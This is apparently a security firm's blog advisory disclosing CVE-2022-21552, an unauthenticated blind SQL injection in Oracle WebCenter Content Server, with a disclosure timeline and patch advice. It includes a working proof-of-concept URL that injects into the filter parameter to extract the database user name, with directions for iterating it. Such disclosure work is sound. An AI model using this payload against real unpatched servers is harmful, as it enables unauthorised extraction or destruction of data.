OrionX Blog

SQL Injection in Oracle WebCenter Content Server CVE-2022-21552

Written by Zacharias Pigadas | 8/4/22 8:40 PM

FGX2022-001: Foregenix OrionX Security Advisory 

CVE: CVE-2022-21552

CVSSv3.1 Base Score: 7.2

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Version: 1.0

 

Vendor: Oracle

Product: WebCenter Content Server

Version(s) affected: 12.2.1.3.0, 12.2.1.4.0

 

Product description

Oracle WebCenter Content Server (Content Server) software enables organisations to share, manage, and distribute business information using a web site as a low-cost access point.

Vulnerability Description

Foregenix has identified a SQL injection vulnerability in Oracle WebCenter Content Server. This vulnerability was identified on parts of Oracle WebCenter Content Server that do not require any authentication, hence it is accessible to any network based attacker. 

The vulnerability exists in the GET_TYPEAHEAD_RESULTS service that appears to provide an autocomplete feature as data is being entered by the user of the application and more specifically on its filter parameter. A vulnerable URL looks like: 

/cs/idcplg?filter=a&IdcService=GET_TYPEAHEAD_RESULTS&searchColumns=dExtRoleName&sortColumns=dExtRoleName&dataSource=ExternalRoles&IsJson=1


By carefully crafting input posted to the filter parameter, an attacker is able to inject his own queries and extract data out of the application or depending on permissions or configuration details, insert, update or even destroy data.  

Proof of Concept 

The vulnerability can be exploited using a typical blind SQL injection exploitation methodology in which True and False conditions are identified and presented to the web interface, permitting  data to be  extracted from the backend database. The following proof of concept has been devised that would allow an attacker to extract the name of the user the application uses to connect to the backend database.

/cs/idcplg?filter='||(select+case+SUBSTR(user,1,1)+when+'a'+then+(select+'an'+from+dual)+else+(select+'zz'+from+dual)+end+from+dual)||'&IdcService=GET_TYPEAHEAD_RESULTS&searchColumns=dExtRoleName&sortColumns=dExtRoleName&dataSource=ExternalRoles&IsJson=1

The above PoC takes the first character of the user variable and compares it with the letter ‘a’, if it matches (True) then it uses ‘an’ as a filter to search for role names, if it does not (False) then it uses ‘zz’. A default role name is ‘anonymous’ so the True condition can be identified through either content or just by looking at its size as it will be larger/contain more content than the False one. By iterating and/or substituting the building blocks of the PoC, one is able to extract arbitrary data out of the database. 

Solution 

Apply the latest patch from the Vendor.

Disclosure 

Foregenix practises responsible disclosure of vulnerabilities and exploits, releasing information in coordination with the vendor as described in our Vulnerability Disclosure Policy. In the case at hand we agreed with the Vendor in extending our normal 90 day disclosure period to adhere to their patch management cycle.

Timeline

31/03/2022 - Vulnerability reported to Vendor

31/03/2022 - Vendor acknowledges receipt

24/04/2022 - Vendor acknowledges Vulnerability

16/05/2022 - Agreement to extend our disclosure period

19/07/2022 - Vulnerability is released by the vendor

04/08/2022 - Vulnerability details are released by Foregenix

About Foregenix

Foregenix is an Information Security specialist, delivering services and solutions to a global client base. Headquartered in the UK with regional offices in the United States, Germany, South Africa, Australia and Uruguay, we specialise in data security, offering services in information security, digital forensics and incident response, governance, enterprise risk management, compliance, and assurance to clients. Our advice is based on experience and understanding of our clients across the banking and finance, telecommunications, retail, hospitality, travel, online gaming and e-commerce industries in Europe, Africa, the United States, Latin America, APAC and the Middle East. Foregenix adds value through the deployment of professional and management consultancy services that fit the corporate risk appetite and budget of its clients.

About OrionX

OrionX is an advanced offensive security team made up of the most experienced Foregenix Penetration Testers that relies on research, specialised tools, creativity and innovative techniques. As such, it inherits all of Foregenix’s experience performing highly complex Penetration Testing projects across a wide range of industries. The team is constantly trained and ready to undertake demanding projects that are beyond the capabilities of ordinary Penetration Testing organisations.

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Foregenix disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Foregenix or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Foregenix or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.